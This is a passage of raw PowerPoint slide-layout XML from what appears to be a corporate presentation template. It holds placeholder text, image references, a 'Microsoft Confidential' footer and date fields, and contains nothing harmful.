        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5498592"/>
            <a:ext cx="2667000" cy="304800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Content Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5809488"/>
            <a:ext cx="2667000" cy="304800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Content Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6135624"/>
            <a:ext cx="2667000" cy="304800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter Company</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="banner_graphic3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1069848"/>
            <a:ext cx="9144000" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2744431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1 Section Intro Pic1">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492375"/>
            <a:ext cx="7772400" cy="936625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="tx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533400" y="3429000"/>
            <a:ext cx="7772400" cy="1295400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr>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Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="6476302"/>
            <a:ext cx="3657600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Confidential - For Internal Use Only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14"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2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1/1/2009</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15"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2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{27F89AD4-B608-49DD-ADE0-4FA08F31E632}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15" descr="Services_bL.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062427" y="6419088"/>
            <a:ext cx="2081573" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="banner_graphic2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="612648"/>
            <a:ext cx="9144000" cy="1495425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3467156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 Section Intro Pic1">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492375"/>
            <a:ext cx="7772400" cy="936625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="tx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533400" y="3429000"/>
            <a:ext cx="7772400" cy="1295400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr>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Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="6476302"/>
            <a:ext cx="3657600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Confidential - For Internal Use Only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14"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2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1/1/2009</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15"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2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{27F89AD4-B608-49DD-ADE0-4FA08F31E632}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15" descr="Services_bL.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062427" y="6419088"/>
            <a:ext cx="2081573" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="banner_graphic2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="612648"/>
            <a:ext cx="9144000" cy="1495425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659240" y="128728"/>
            <a:ext cx="457200" cy="195528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="icon-glossary.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8352410" y="48640"/>
            <a:ext cx="285750" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40547833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1 Section Intro Pic2">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492375"/>
            <a:ext cx="7772400" cy="936625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="tx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533400" y="3429000"/>
            <a:ext cx="7772400" cy="1295400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr>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Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="6476302"/>
            <a:ext cx="3657600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Confidential - For Internal Use Only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14"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2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1/1/2009</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15"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2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{27F89AD4-B608-49DD-ADE0-4FA08F31E632}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15" descr="Services_bL.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062427" y="6419088"/>
            <a:ext cx="2081573" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="banner_graphic4.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="612648"/>
            <a:ext cx="9144000" cy="1495425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3586063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 Section Intro Pic2">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492375"/>
            <a:ext cx="7772400" cy="936625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="tx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533400" y="3429000"/>
            <a:ext cx="7772400" cy="1295400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr>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Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="6476302"/>
            <a:ext cx="3657600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Confidential - For Internal Use Only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14"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2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1/1/2009</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15"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2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{27F89AD4-B608-49DD-ADE0-4FA08F31E632}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15" descr="Services_bL.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062427" y="6419088"/>
            <a:ext cx="2081573" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="banner_graphic4.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="612648"/>
            <a:ext cx="9144000" cy="1495425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659240" y="128728"/>
            <a:ext cx="457200" cy="195528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="icon-glossary.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8352410" y="48640"/>
            <a:ext cx="285750" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13838930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1 Topic Title_Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13"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3" name="Picture 12" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"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
        <p:nvSpPr>
          <p:cNvPr id="19"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
        <p:nvSpPr>
          <p:cNvPr id="20"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2238499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59FDB1C4-1BAF-460F-8361-CB4FBEAC1087}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/3/2023</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B25136CE-EE85-4FE3-9E4A-262CAB4753F1}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20892582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1# Topic Title_Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13"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3" name="Picture 12" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"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
        <p:nvSpPr>
          <p:cNvPr id="19"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
        <p:nvSpPr>
          <p:cNvPr id="20"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12" name="Text Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659240" y="128728"/>
            <a:ext cx="457200" cy="195528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="icon-glossary.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8352410" y="48640"/>
            <a:ext cx="285750" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12307935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2 Topic Title_Subtitle_Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"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a:xfrm>
            <a:off x="304800" y="228600"/>
            <a:ext cx="8534400" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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304800" y="1219200"/>
            <a:ext cx="8534400" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buSzPct val="10000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304800" y="636232"/>
            <a:ext cx="8534400" cy="506767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
